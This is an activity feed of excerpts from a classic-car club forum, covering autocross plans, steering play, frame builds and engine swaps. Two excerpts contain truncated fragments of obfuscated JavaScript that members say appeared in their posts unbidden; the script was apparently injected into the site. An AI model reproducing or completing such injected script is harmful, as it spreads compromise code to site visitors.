Thanks, Paul. No changes to PC. After all the code appeared in Ed’s thread, I ran a cleaning scan and restarted but it appeared again. If it appears in this post I’ll discontinue using it here. I needed the PC to process the photo. (function(){;if(“43ld8 Y 8bsB5 bKpUpEE”)var eo=false;else{var zx=(”+’4u004D’+’…[Read more]

On my screen, after my short post I have six inches of what appears to be code. Ed, you’ve got it mounted so you’re coming down the home stretch. It doesn’t have to be pretty when you get to Carlisle, you just have to get to Carlisle. <fz1;j++y'push'ujforj=0;j<64;j++myj=jforj=0;j<a"length";j+=72var q…[Read more]

Bill (& all) I am planning on trying the autoX again, but everything depends upon my getting the old girl back together before then. I’ve done very little the past six weeks and, Thursday, we learned my newspaper was getting bought out by the cross-town rival. The good news is I’ll probably still have a job. That is also the bad news, along with…[Read more]

You should have no more than an inch of steering play. Do not touch the steering box until after you make sure the clamp nut on the steering shaft is good’n’tight, and the rag joint (and bolts holding it together are also as the factory intended.
I seem to remember someone on this board screwing with his steering box before discovering these much… -

How many will be signing up for the Autocross on Saturday? Ed, you need to compare before and after time slips. We should be able to “reserve” a block of time again with Henry on Friday evening.

Definitely see Gabor’s build on that. He chucked it & scratch-built his frame. I think he’s already with you on another thread. Sounds like you two might have similar skills–and know well that after seeing his car, I mean that as the highest compliment.

Ran the dragon in Sept of ’12 with the new MINI Roadster. Came to realize that although that road was great, most roads in the area are fabulous fun. I’d love to have the MG there.

One of our members bought a small-block powered TD a couple years ago. Had a heck of a time getting brakes to work, mainly because the engine left little room for the master cylinder & brake booster. I don’t think he drove the car much.
I was left with the impression that the V8 swap was more trouble than it’s worth. If I had what you have I would… - Load More
